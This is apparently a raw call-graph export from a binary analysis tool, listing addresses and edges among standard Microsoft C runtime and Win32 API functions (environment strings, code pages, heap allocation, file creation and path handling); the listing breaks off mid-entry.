Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 16351->16352 16352->16353 16353->16088 16354 7ff6b9f2955c 16353->16354 16355 7ff6b9f29585 16354->16355 16360 7ff6b9f2959e 16354->16360 16355->16088 16356 7ff6b9f2ec08 _get_daylight 11 API calls 16356->16360 16357 7ff6b9f2962e 16359 7ff6b9f2a9b8 Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 16357->16359 16358 7ff6b9f30858 WideCharToMultiByte 16358->16360 16359->16355 16360->16355 16360->16356 16360->16357 16360->16358 16361 7ff6b9f2a9b8 Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 16360->16361 16361->16360 16363 7ff6b9f29226 16362->16363 16364 7ff6b9f3266d 16362->16364 16368 7ff6b9f3299c GetEnvironmentStringsW 16363->16368 16407 7ff6b9f2b294 16364->16407 16369 7ff6b9f329cc 16368->16369 16370 7ff6b9f2922b 16368->16370 16371 7ff6b9f30858 WideCharToMultiByte 16369->16371 16370->16345 16370->16346 16372 7ff6b9f32a1d 16371->16372 16373 7ff6b9f32a24 FreeEnvironmentStringsW 16372->16373 16374 7ff6b9f2d66c _fread_nolock 12 API calls 16372->16374 16373->16370 16375 7ff6b9f32a37 16374->16375 16376 7ff6b9f32a48 16375->16376 16377 7ff6b9f32a3f 16375->16377 16379 7ff6b9f30858 WideCharToMultiByte 16376->16379 16378 7ff6b9f2a9b8 Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 16377->16378 16380 7ff6b9f32a46 16378->16380 16381 7ff6b9f32a6b 16379->16381 16380->16373 16382 7ff6b9f32a79 16381->16382 16383 7ff6b9f32a6f 16381->16383 16385 7ff6b9f2a9b8 Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 16382->16385 16384 7ff6b9f2a9b8 Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 16383->16384 16386 7ff6b9f32a77 FreeEnvironmentStringsW 16384->16386 16385->16386 16386->16370 16389 7ff6b9f29311 16388->16389 16390 7ff6b9f2ec08 _get_daylight 11 API calls 16389->16390 16402 7ff6b9f29347 16390->16402 16391 7ff6b9f2934f 16392 7ff6b9f2a9b8 Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 16391->16392 16393 7ff6b9f29247 16392->16393 16393->16350 16394 7ff6b9f293c2 16395 7ff6b9f2a9b8 Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 16394->16395 16395->16393 16396 7ff6b9f2ec08 _get_daylight 11 API calls 16396->16402 16397 7ff6b9f293b1 16626 7ff6b9f29518 16397->16626 16399 7ff6b9f2a514 __std_exception_copy 37 API calls 16399->16402 16401 7ff6b9f293e7 16405 7ff6b9f2a970 _isindst 17 API calls 16401->16405 16402->16391 16402->16394 16402->16396 16402->16397 16402->16399 16402->16401 16404 7ff6b9f2a9b8 Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 16402->16404 16403 7ff6b9f2a9b8 Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 16403->16391 16404->16402 16406 7ff6b9f293fa 16405->16406 16408 7ff6b9f2b2c0 FlsSetValue 16407->16408 16409 7ff6b9f2b2a5 FlsGetValue 16407->16409 16411 7ff6b9f2b2b2 16408->16411 16412 7ff6b9f2b2cd 16408->16412 16410 7ff6b9f2b2ba 16409->16410 16409->16411 16410->16408 16413 7ff6b9f2a574 __CxxCallCatchBlock 45 API calls 16411->16413 16415 7ff6b9f2b2b8 16411->16415 16414 7ff6b9f2ec08 _get_daylight 11 API calls 16412->16414 16416 7ff6b9f2b335 16413->16416 16417 7ff6b9f2b2dc 16414->16417 16427 7ff6b9f32334 16415->16427 16418 7ff6b9f2b2fa FlsSetValue 16417->16418 16419 7ff6b9f2b2ea FlsSetValue 16417->16419 16421 7ff6b9f2b318 16418->16421 16422 7ff6b9f2b306 FlsSetValue 16418->16422 16420 7ff6b9f2b2f3 16419->16420 16423 7ff6b9f2a9b8 Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 16420->16423 16424 7ff6b9f2af64 _get_daylight 11 API calls 16421->16424 16422->16420 16423->16411 16425 7ff6b9f2b320 16424->16425 16426 7ff6b9f2a9b8 Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 16425->16426 16426->16415 16450 7ff6b9f325a4 16427->16450 16429 7ff6b9f32369 16465 7ff6b9f32034 16429->16465 16434 7ff6b9f3239f 16435 7ff6b9f2a9b8 Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 16434->16435 16449 7ff6b9f32386 16435->16449 16436 7ff6b9f323ae 16436->16436 16479 7ff6b9f326dc 16436->16479 16439 7ff6b9f324aa 16440 7ff6b9f24f78 _get_daylight 11 API calls 16439->16440 16442 7ff6b9f324af 16440->16442 16441 7ff6b9f32505 16444 7ff6b9f3256c 16441->16444 16490 7ff6b9f31e64 16441->16490 16445 7ff6b9f2a9b8 Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 16442->16445 16443 7ff6b9f324c4 16443->16441 16446 7ff6b9f2a9b8 Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 16443->16446 16448 7ff6b9f2a9b8 Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 16444->16448 16445->16449 16446->16441 16448->16449 16449->16363 16451 7ff6b9f325c7 16450->16451 16453 7ff6b9f325d1 16451->16453 16505 7ff6b9f30348 EnterCriticalSection 16451->16505 16454 7ff6b9f32643 16453->16454 16456 7ff6b9f2a574 __CxxCallCatchBlock 45 API calls 16453->16456 16454->16429 16458 7ff6b9f3265b 16456->16458 16460 7ff6b9f326b2 16458->16460 16462 7ff6b9f2b294 50 API calls 16458->16462 16460->16429 16463 7ff6b9f3269c 16462->16463 16464 7ff6b9f32334 65 API calls 16463->16464 16464->16460 16506 7ff6b9f24fbc 16465->16506 16468 7ff6b9f32066 16470 7ff6b9f3207b 16468->16470 16471 7ff6b9f3206b GetACP 16468->16471 16469 7ff6b9f32054 GetOEMCP 16469->16470 16470->16449 16472 7ff6b9f2d66c 16470->16472 16471->16470 16473 7ff6b9f2d6b7 16472->16473 16477 7ff6b9f2d67b _get_daylight 16472->16477 16475 7ff6b9f24f78 _get_daylight 11 API calls 16473->16475 16474 7ff6b9f2d69e HeapAlloc 16476 7ff6b9f2d6b5 16474->16476 16474->16477 16475->16476 16476->16434 16476->16436 16477->16473 16477->16474 16478 7ff6b9f33600 _get_daylight 2 API calls 16477->16478 16478->16477 16480 7ff6b9f32034 47 API calls 16479->16480 16481 7ff6b9f32709 16480->16481 16482 7ff6b9f3285f 16481->16482 16484 7ff6b9f32746 IsValidCodePage 16481->16484 16489 7ff6b9f32760 __scrt_get_show_window_mode 16481->16489 16483 7ff6b9f1c5c0 _log10_special 8 API calls 16482->16483 16485 7ff6b9f324a1 16483->16485 16484->16482 16486 7ff6b9f32757 16484->16486 16485->16439 16485->16443 16487 7ff6b9f32786 GetCPInfo 16486->16487 16486->16489 16487->16482 16487->16489 16538 7ff6b9f3214c 16489->16538 16625 7ff6b9f30348 EnterCriticalSection 16490->16625 16507 7ff6b9f24fdb 16506->16507 16508 7ff6b9f24fe0 16506->16508 16507->16468 16507->16469 16508->16507 16509 7ff6b9f2b1c0 __CxxCallCatchBlock 45 API calls 16508->16509 16510 7ff6b9f24ffb 16509->16510 16514 7ff6b9f2d9f4 16510->16514 16515 7ff6b9f2da09 16514->16515 16516 7ff6b9f2501e 16514->16516 16515->16516 16522 7ff6b9f33374 16515->16522 16518 7ff6b9f2da60 16516->16518 16519 7ff6b9f2da88 16518->16519 16520 7ff6b9f2da75 16518->16520 16519->16507 16520->16519 16535 7ff6b9f326c0 16520->16535 16523 7ff6b9f2b1c0 __CxxCallCatchBlock 45 API calls 16522->16523 16524 7ff6b9f33383 16523->16524 16525 7ff6b9f333ce 16524->16525 16534 7ff6b9f30348 EnterCriticalSection 16524->16534 16525->16516 16536 7ff6b9f2b1c0 __CxxCallCatchBlock 45 API calls 16535->16536 16537 7ff6b9f326c9 16536->16537 16539 7ff6b9f32189 GetCPInfo 16538->16539 16548 7ff6b9f3227f 16538->16548 16544 7ff6b9f3219c 16539->16544 16539->16548 16540 7ff6b9f1c5c0 _log10_special 8 API calls 16541 7ff6b9f3231e 16540->16541 16541->16482 16549 7ff6b9f32eb0 16544->16549 16548->16540 16550 7ff6b9f24fbc 45 API calls 16549->16550 16551 7ff6b9f32ef2 16550->16551 16569 7ff6b9f2f910 16551->16569 16571 7ff6b9f2f919 MultiByteToWideChar 16569->16571 16627 7ff6b9f293b9 16626->16627 16628 7ff6b9f2951d 16626->16628 16627->16403 16629 7ff6b9f29546 16628->16629 16630 7ff6b9f2a9b8 Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 16628->16630 16631 7ff6b9f2a9b8 Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 16629->16631 16630->16628 16631->16627 16633 7ff6b9f36348 16632->16633 16634 7ff6b9f36331 16632->16634 16633->16634 16637 7ff6b9f36356 16633->16637 16635 7ff6b9f24f78 _get_daylight 11 API calls 16634->16635 16636 7ff6b9f36336 16635->16636 16638 7ff6b9f2a950 _invalid_parameter_noinfo 37 API calls 16636->16638 16639 7ff6b9f24fbc 45 API calls 16637->16639 16640 7ff6b9f36341 16637->16640 16638->16640 16639->16640 16640->16134 16642 7ff6b9f24fbc 45 API calls 16641->16642 16643 7ff6b9f38fe1 16642->16643 16646 7ff6b9f38c38 16643->16646 16650 7ff6b9f38c86 16646->16650 16647 7ff6b9f1c5c0 _log10_special 8 API calls 16648 7ff6b9f37275 16647->16648 16648->16133 16648->16134 16649 7ff6b9f38d0d 16651 7ff6b9f2f910 _fread_nolock MultiByteToWideChar 16649->16651 16655 7ff6b9f38d11 16649->16655 16650->16649 16652 7ff6b9f38cf8 GetCPInfo 16650->16652 16650->16655 16653 7ff6b9f38da5 16651->16653 16652->16649 16652->16655 16654 7ff6b9f2d66c _fread_nolock 12 API calls 16653->16654 16653->16655 16656 7ff6b9f38ddc 16653->16656 16654->16656 16655->16647 16656->16655 16657 7ff6b9f2f910 _fread_nolock MultiByteToWideChar 16656->16657 16658 7ff6b9f38e4a 16657->16658 16659 7ff6b9f38f2c 16658->16659 16660 7ff6b9f2f910 _fread_nolock MultiByteToWideChar 16658->16660 16659->16655 16661 7ff6b9f2a9b8 Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 16659->16661 16662 7ff6b9f38e70 16660->16662 16661->16655 16662->16659 16663 7ff6b9f2d66c _fread_nolock 12 API calls 16662->16663 16664 7ff6b9f38e9d 16662->16664 16663->16664 16664->16659 16665 7ff6b9f2f910 _fread_nolock MultiByteToWideChar 16664->16665 16666 7ff6b9f38f14 16665->16666 16667 7ff6b9f38f1a 16666->16667 16668 7ff6b9f38f34 16666->16668 16667->16659 16670 7ff6b9f2a9b8 Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 16667->16670 16675 7ff6b9f2efd8 16668->16675 16670->16659 16672 7ff6b9f38f73 16672->16655 16674 7ff6b9f2a9b8 Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 16672->16674 16673 7ff6b9f2a9b8 Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 16673->16672 16674->16655 16676 7ff6b9f2ed80 __crtLCMapStringW 5 API calls 16675->16676 16677 7ff6b9f2f016 16676->16677 16678 7ff6b9f2f01e 16677->16678 16679 7ff6b9f2f240 __crtLCMapStringW 5 API calls 16677->16679 16678->16672 16678->16673 16680 7ff6b9f2f087 CompareStringW 16679->16680 16680->16678 16682 7ff6b9f37cca HeapSize 16681->16682 16683 7ff6b9f37cb1 16681->16683 16684 7ff6b9f24f78 _get_daylight 11 API calls 16683->16684 16685 7ff6b9f37cb6 16684->16685 16686 7ff6b9f2a950 _invalid_parameter_noinfo 37 API calls 16685->16686 16687 7ff6b9f37cc1 16686->16687 16687->16139 16689 7ff6b9f37cf9 16688->16689 16690 7ff6b9f37d03 16688->16690 16692 7ff6b9f2d66c _fread_nolock 12 API calls 16689->16692 16691 7ff6b9f37d08 16690->16691 16698 7ff6b9f37d0f _get_daylight 16690->16698 16693 7ff6b9f2a9b8 Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 16691->16693 16696 7ff6b9f37d01 16692->16696 16693->16696 16694 7ff6b9f37d15 16697 7ff6b9f24f78 _get_daylight 11 API calls 16694->16697 16695 7ff6b9f37d42 HeapReAlloc 16695->16696 16695->16698 16696->16143 16697->16696 16698->16694 16698->16695 16699 7ff6b9f33600 _get_daylight 2 API calls 16698->16699 16699->16698 16701 7ff6b9f2ed80 __crtLCMapStringW 5 API calls 16700->16701 16702 7ff6b9f2efb4 16701->16702 16702->16147 16704 7ff6b9f25546 16703->16704 16705 7ff6b9f2556a 16703->16705 16709 7ff6b9f2a9b8 Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 16704->16709 16710 7ff6b9f25555 16704->16710 16706 7ff6b9f2556f 16705->16706 16707 7ff6b9f255c4 16705->16707 16706->16710 16711 7ff6b9f2a9b8 Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 16706->16711 16716 7ff6b9f25584 16706->16716 16708 7ff6b9f2f910 _fread_nolock MultiByteToWideChar 16707->16708 16715 7ff6b9f255e0 16708->16715 16709->16710 16710->16151 16710->16152 16711->16716 16712 7ff6b9f2d66c _fread_nolock 12 API calls 16712->16710 16713 7ff6b9f255e7 GetLastError 16725 7ff6b9f24eec 16713->16725 16714 7ff6b9f25622 16714->16710 16719 7ff6b9f2f910 _fread_nolock MultiByteToWideChar 16714->16719 16715->16713 16715->16714 16718 7ff6b9f25615 16715->16718 16721 7ff6b9f2a9b8 Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 16715->16721 16716->16712 16722 7ff6b9f2d66c _fread_nolock 12 API calls 16718->16722 16723 7ff6b9f25666 16719->16723 16721->16718 16722->16714 16723->16710 16723->16713 16724 7ff6b9f24f78 _get_daylight 11 API calls 16724->16710 16726 7ff6b9f2b338 _get_daylight 11 API calls 16725->16726 16727 7ff6b9f24ef9 Concurrency::details::SchedulerProxy::DeleteThis 16726->16727 16728 7ff6b9f2b338 _get_daylight 11 API calls 16727->16728 16729 7ff6b9f24f1b 16728->16729 16729->16724 19572 7ff6b9f29dc0 19575 7ff6b9f29d3c 19572->19575 19582 7ff6b9f30348 EnterCriticalSection 19575->19582 19875 7ff6b9f2b040 19876 7ff6b9f2b045 19875->19876 19880 7ff6b9f2b05a 19875->19880 19881 7ff6b9f2b060 19876->19881 19882 7ff6b9f2b0aa 19881->19882 19883 7ff6b9f2b0a2 19881->19883 19885 7ff6b9f2a9b8 Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 19882->19885 19884 7ff6b9f2a9b8 Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 19883->19884 19884->19882 19886 7ff6b9f2b0b7 19885->19886 19887 7ff6b9f2a9b8 Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 19886->19887 19888 7ff6b9f2b0c4 19887->19888 19889 7ff6b9f2a9b8 Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 19888->19889 19890 7ff6b9f2b0d1 19889->19890 19891 7ff6b9f2a9b8 Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 19890->19891 19892 7ff6b9f2b0de 19891->19892 19893 7ff6b9f2a9b8 Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 19892->19893 19894 7ff6b9f2b0eb 19893->19894 19895 7ff6b9f2a9b8 Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 19894->19895 19896 7ff6b9f2b0f8 19895->19896 19897 7ff6b9f2a9b8 Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 19896->19897 19898 7ff6b9f2b105 19897->19898 19899 7ff6b9f2a9b8 Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 19898->19899 19900 7ff6b9f2b115 19899->19900 19901 7ff6b9f2a9b8 Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 19900->19901 19902 7ff6b9f2b125 19901->19902 19907 7ff6b9f2af04 19902->19907 19921 7ff6b9f30348 EnterCriticalSection 19907->19921 19586 7ff6b9f1cbc0 19587 7ff6b9f1cbd0 19586->19587 19603 7ff6b9f29c18 19587->19603 19589 7ff6b9f1cbdc 19609 7ff6b9f1ceb8 19589->19609 19591 7ff6b9f1d19c 7 API calls 19593 7ff6b9f1cc75 19591->19593 19592 7ff6b9f1cbf4 _RTC_Initialize 19601 7ff6b9f1cc49 19592->19601 19614 7ff6b9f1d068 19592->19614 19595 7ff6b9f1cc09 19617 7ff6b9f29084 19595->19617 19601->19591 19602 7ff6b9f1cc65 19601->19602 19604 7ff6b9f29c29 19603->19604 19605 7ff6b9f24f78 _get_daylight 11 API calls 19604->19605 19608 7ff6b9f29c31 19604->19608 19606 7ff6b9f29c40 19605->19606 19607 7ff6b9f2a950 _invalid_parameter_noinfo 37 API calls 19606->19607 19607->19608 19608->19589 19610 7ff6b9f1cec9 19609->19610 19613 7ff6b9f1cece __scrt_release_startup_lock 19609->19613 19611 7ff6b9f1d19c 7 API calls 19610->19611 19610->19613 19612 7ff6b9f1cf42 19611->19612 19613->19592 19642 7ff6b9f1d02c 19614->19642 19616 7ff6b9f1d071 19616->19595 19618 7ff6b9f290a4 19617->19618 19625 7ff6b9f1cc15 19617->19625 19619 7ff6b9f290ac 19618->19619 19620 7ff6b9f290c2 GetModuleFileNameW 19618->19620 19621 7ff6b9f24f78 _get_daylight 11 API calls 19619->19621 19622 7ff6b9f290ed 19620->19622 19623 7ff6b9f290b1 19621->19623 19657 7ff6b9f29024 19622->19657 19624 7ff6b9f2a950 _invalid_parameter_noinfo 37 API calls 19623->19624 19624->19625 19625->19601 19641 7ff6b9f1d13c InitializeSListHead 19625->19641 19628 7ff6b9f29135 19629 7ff6b9f24f78 _get_daylight 11 API calls 19628->19629 19630 7ff6b9f2913a 19629->19630 19633 7ff6b9f2a9b8 Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 19630->19633 19631 7ff6b9f2916f 19634 7ff6b9f2a9b8 Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 19631->19634 19632 7ff6b9f2914d 19632->19631 19635 7ff6b9f2919b 19632->19635 19636 7ff6b9f291b4 19632->19636 19633->19625 19634->19625 19637 7ff6b9f2a9b8 Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 19635->19637 19639 7ff6b9f2a9b8 Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 19636->19639 19638 7ff6b9f291a4 19637->19638 19640 7ff6b9f2a9b8 Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 19638->19640 19639->19631 19640->19625 19643 7ff6b9f1d046 19642->19643 19645 7ff6b9f1d03f 19642->19645 19646 7ff6b9f2a25c 19643->19646 19645->19616 19649 7ff6b9f29e98 19646->19649 19656 7ff6b9f30348 EnterCriticalSection 19649->19656 19658 7ff6b9f29074 19657->19658 19659 7ff6b9f2903c 19657->19659 19658->19628 19658->19632 19659->19658 19660 7ff6b9f2ec08 _get_daylight 11 API calls 19659->19660 19661 7ff6b9f2906a 19660->19661 19662 7ff6b9f2a9b8 Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 19661->19662 19662->19658 19380 7ff6b9f299d1 19381 7ff6b9f2a448 45 API calls 19380->19381 19382 7ff6b9f299d6 19381->19382 19383 7ff6b9f29a47 19382->19383 19384 7ff6b9f299fd GetModuleHandleW 19382->19384 19392 7ff6b9f298d4 19383->19392 19384->19383 19388 7ff6b9f29a0a 19384->19388 19388->19383 19406 7ff6b9f29af8 GetModuleHandleExW 19388->19406 19412 7ff6b9f30348 EnterCriticalSection 19392->19412 19407 7ff6b9f29b2c GetProcAddress 19406->19407 19408 7ff6b9f29b55 19406->19408 19409 7ff6b9f29b3e 19407->19409 19410 7ff6b9f29b5a FreeLibrary 19408->19410 19411 7ff6b9f29b61 19408->19411 19409->19408 19410->19411 19411->19383 19423 7ff6b9f1bb50 19424 7ff6b9f1bb7e 19423->19424 19425 7ff6b9f1bb65 19423->19425 19425->19424 19427 7ff6b9f2d66c 12 API calls 19425->19427 19426 7ff6b9f1bbde 19427->19426 19923 7ff6b9f3ac53 19924 7ff6b9f3ac63 19923->19924 19927 7ff6b9f254e8 LeaveCriticalSection 19924->19927 19693 7ff6b9f3add9 19696 7ff6b9f254e8 LeaveCriticalSection 19693->19696 19933 7ff6b9f3ae6e 19934 7ff6b9f3ae7d 19933->19934 19936 7ff6b9f3ae87 19933->19936 19937 7ff6b9f303a8 LeaveCriticalSection 19934->19937 19784 7ff6b9f2f9fc 19785 7ff6b9f2fbee 19784->19785 19787 7ff6b9f2fa3e _isindst 19784->19787 19786 7ff6b9f24f78 _get_daylight 11 API calls 19785->19786 19804 7ff6b9f2fbde 19786->19804 19787->19785 19790 7ff6b9f2fabe _isindst 19787->19790 19788 7ff6b9f1c5c0 _log10_special 8 API calls 19789 7ff6b9f2fc09 19788->19789 19805 7ff6b9f36204 19790->19805 19795 7ff6b9f2fc1a 19797 7ff6b9f2a970 _isindst 17 API calls 19795->19797 19799 7ff6b9f2fc2e 19797->19799 19802 7ff6b9f2fb1b 19802->19804 19830 7ff6b9f36248 19802->19830 19804->19788 19806 7ff6b9f2fadc 19805->19806 19807 7ff6b9f36213 19805->19807 19812 7ff6b9f35608 19806->19812 19837 7ff6b9f30348 EnterCriticalSection 19807->19837 19813 7ff6b9f35611 19812->19813 19815 7ff6b9f2faf1 19812->19815 19814 7ff6b9f24f78 _get_daylight 11 API calls 19813->19814 19816 7ff6b9f35616 19814->19816 19815->19795 19818 7ff6b9f35638 19815->19818 19817 7ff6b9f2a950 _invalid_parameter_noinfo 37 API calls 19816->19817 19817->19815 19819 7ff6b9f2fb02 19818->19819 19820 7ff6b9f35641 19818->19820 19819->19795 19824 7ff6b9f35668 19819->19824 19821 7ff6b9f24f78 _get_daylight 11 API calls 19820->19821 19822 7ff6b9f35646 19821->19822 19823 7ff6b9f2a950 _invalid_parameter_noinfo 37 API calls 19822->19823 19823->19819 19825 7ff6b9f35671 19824->19825 19829 7ff6b9f2fb13 19824->19829 19826 7ff6b9f24f78 _get_daylight 11 API calls 19825->19826 19827 7ff6b9f35676 19826->19827 19828 7ff6b9f2a950 _invalid_parameter_noinfo 37 API calls 19827->19828 19828->19829 19829->19795 19829->19802 19838 7ff6b9f30348 EnterCriticalSection 19830->19838 19947 7ff6b9f25480 19948 7ff6b9f2548b 19947->19948 19956 7ff6b9f2f314 19948->19956 19969 7ff6b9f30348 EnterCriticalSection 19956->19969 19501 7ff6b9f2c590 19512 7ff6b9f30348 EnterCriticalSection 19501->19512 16730 7ff6b9f25698 16731 7ff6b9f256cf 16730->16731 16732 7ff6b9f256b2 16730->16732 16731->16732 16734 7ff6b9f256e2 CreateFileW 16731->16734 16755 7ff6b9f24f58 16732->16755 16736 7ff6b9f25716 16734->16736 16737 7ff6b9f2574c 16734->16737 16758 7ff6b9f257ec GetFileType 16736->16758 16784 7ff6b9f25c74 16737->16784 16738 7ff6b9f24f78 _get_daylight 11 API calls 16741 7ff6b9f256bf 16738->16741 16746 7ff6b9f2a950 _invalid_parameter_noinfo 37 API calls 16741->16746 16744 7ff6b9f25780 16805 7ff6b9f25a34 16744->16805 16745 7ff6b9f25755 16749 7ff6b9f24eec _fread_nolock 11 API calls 16745->16749 16750 7ff6b9f256ca 16746->16750 16747 7ff6b9f2572b CloseHandle 16747->16750 16748 7ff6b9f25741 CloseHandle 16748->16750 16754 7ff6b9f2575f 16749->16754 16754->16750 16756 7ff6b9f2b338 _get_daylight 11 API calls 16755->16756 16757 7ff6b9f24f61 16756->16757 16757->16738 16759 7ff6b9f258f7 16758->16759 16760 7ff6b9f2583a 16758->16760 16762 7ff6b9f258ff 16759->16762 16763 7ff6b9f25921 16759->16763 16761 7ff6b9f25866 GetFileInformationByHandle 16760->16761 16765 7ff6b9f25b70 21 API calls 16760->16765 16766 7ff6b9f2588f 16761->16766 16767 7ff6b9f25912 GetLastError 16761->16767 16762->16767 16768 7ff6b9f25903 16762->16768 16764 7ff6b9f25944 PeekNamedPipe 16763->16764 16782 7ff6b9f258e2 16763->16782 16764->16782 16769 7ff6b9f25854 16765->16769 16770 7ff6b9f25a34 51 API calls 16766->16770 16772 7ff6b9f24eec _fread_nolock 11 API calls 16767->16772 16771 7ff6b9f24f78 _get_daylight 11 API calls 16768->16771 16769->16761 16769->16782 16774 7ff6b9f2589a 16770->16774 16771->16782 16772->16782 16773 7ff6b9f1c5c0 _log10_special 8 API calls 16775 7ff6b9f25724 16773->16775 16822 7ff6b9f25994 16774->16822 16775->16747 16775->16748 16778 7ff6b9f25994 10 API calls 16779 7ff6b9f258b9 16778->16779 16780 7ff6b9f25994 10 API calls 16779->16780 16781 7ff6b9f258ca 16780->16781 16781->16782 16783 7ff6b9f24f78 _get_daylight 11 API calls 16781->16783 16782->16773 16783->16782 16785 7ff6b9f25caa 16784->16785 16786 7ff6b9f24f78 _get_daylight 11 API calls 16785->16786 16804 7ff6b9f25d42 __std_exception_copy 16785->16804 16788 7ff6b9f25cbc 16786->16788 16787 7ff6b9f1c5c0 _log10_special 8 API calls 16790 7ff6b9f25751 16787->16790 16789 7ff6b9f24f78 _get_daylight 11 API calls 16788->16789 16791 7ff6b9f25cc4 16789->16791 16790->16744 16790->16745 16829 7ff6b9f27e78 16791->16829 16793 7ff6b9f25cd9 16794 7ff6b9f25ceb 16793->16794 16795 7ff6b9f25ce1 16793->16795 16797 7ff6b9f24f78 _get_daylight 11 API calls 16794->16797 16796 7ff6b9f24f78 _get_daylight 11 API calls 16795->16796 16801 7ff6b9f25ce6 16796->16801 16798 7ff6b9f25cf0 16797->16798 16799 7ff6b9f24f78 _get_daylight 11 API calls 16798->16799 16798->16804 16800 7ff6b9f25cfa 16799->16800 16803 7ff6b9f27e78 45 API calls 16800->16803 16802 7ff6b9f25d34 GetDriveTypeW 16801->16802 16801->16804 16802->16804 16803->16801 16804->16787 16807 7ff6b9f25a5c 16805->16807 16806 7ff6b9f2578d 16815 7ff6b9f25b70 16806->16815 16807->16806 16923 7ff6b9f2f794 16807->16923 16809 7ff6b9f25af0 16809->16806 16810 7ff6b9f2f794 51 API calls 16809->16810 16811 7ff6b9f25b03 16810->16811 16811->16806 16812 7ff6b9f2f794 51 API calls 16811->16812 16813 7ff6b9f25b16 16812->16813 16813->16806 16814 7ff6b9f2f794 51 API calls 16813->16814 16814->16806 16816 7ff6b9f25b8a 16815->16816 16817 7ff6b9f25bc1 16816->16817 16818 7ff6b9f25b9a 16816->16818 16819 7ff6b9f2f628 21 API calls 16817->16819 16820 7ff6b9f25baa 16818->16820 16821 7ff6b9f24eec _fread_nolock 11 API calls 16818->16821 16819->16820 16820->16754 16821->16820 16823 7ff6b9f259bd FileTimeToSystemTime 16822->16823 16824 7ff6b9f259b0 16822->16824 16825 7ff6b9f259d1 SystemTimeToTzSpecificLocalTime 16823->16825 16826 7ff6b9f259b8 16823->16826 16824->16823 16824->16826 16825->16826 16827 7ff6b9f1c5c0 _log10_special 8 API calls 16826->16827 16828 7ff6b9f258a9 16827->16828 16828->16778 16830 7ff6b9f27f02 16829->16830 16831 7ff6b9f27e94 16829->16831 16866 7ff6b9f30830 16830->16866 16831->16830 16833 7ff6b9f27e99 16831->16833 16834 7ff6b9f27ece 16833->16834 16835 7ff6b9f27eb1 16833->16835 16849 7ff6b9f27cbc GetFullPathNameW 16834->16849 16841 7ff6b9f27c48 GetFullPathNameW 16835->16841 16840 7ff6b9f27ec6 __std_exception_copy 16840->16793 16842 7ff6b9f27c6e GetLastError 16841->16842 16843 7ff6b9f27c84 16841->16843 16844 7ff6b9f24eec _fread_nolock 11 API calls 16842->16844 16847 7ff6b9f24f78 _get_daylight 11 API calls 16843->16847 16848 7ff6b9f27c80 16843->16848 16845 7ff6b9f27c7b 16844->16845 16846 7ff6b9f24f78 _get_daylight 11 API calls 16845->16846 16846->16848 16847->16848 16848->16840 16850 7ff6b9f27cef GetLastError 16849->16850 16855 7ff6b9f27d05 __std_exception_copy 16849->16855 16851 7ff6b9f24eec _fread_nolock 11 API calls 16850->16851 16852 7ff6b9f27cfc 16851->16852 16853 7ff6b9f24f78 _get_daylight 11 API calls 16852->16853 16854 7ff6b9f27d01 16853->16854 16857 7ff6b9f27d94 16854->16857 16855->16854 16856 7ff6b9f27d5f GetFullPathNameW 16855->16856 16856->16850 16856->16854 16860 7ff6b9f27e08 memcpy_s 16857->16860 16861 7ff6b9f27dbd __scrt_get_show_window_mode 16857->16861 16858 7ff6b9f27df1 16859 7ff6b9f24f78 _get_daylight 11 API calls 16858->16859 16862 7ff6b9f27df6 16859->16862 16860->16840 16861->16858 16861->16860 16863 7ff6b9f27e2a 16861->16863 16864 7ff6b9f2a950 _invalid_parameter_noinfo 37 API calls 16862->16864 16863->16860 16865 7ff6b9f24f78 _get_daylight 11 API calls 16863->16865 16864->16860 16865->16862 16869 7ff6b9f30640 16866->16869 16870 7ff6b9f3066b 16869->16870 16871 7ff6b9f30682 16869->16871 16872 7ff6b9f24f78 _get_daylight 11 API calls 16870->16872 16873 7ff6b9f30686 16871->16873 16874 7ff6b9f306a7 16871->16874 16877 7ff6b9f30670 16872->16877 16895 7ff6b9f307ac 16873->16895 16907 7ff6b9f2f628 16874->16907 16881 7ff6b9f2a950 _invalid_parameter_noinfo 37 API calls 16877->16881 16879 7ff6b9f306ac 16884 7ff6b9f30751 16879->16884 16890 7ff6b9f306d3 16879->16890 16880 7ff6b9f3068f 16882 7ff6b9f24f58 _fread_nolock 11 API calls 16880->16882 16894 7ff6b9f3067b __std_exception_copy 16881->16894 16883 7ff6b9f30694 16882->16883 16887 7ff6b9f24f78 _get_daylight 11 API calls 16883->16887 16884->16870 16885 7ff6b9f30759 16884->16885 16888 7ff6b9f27c48 13 API calls 16885->16888 16886 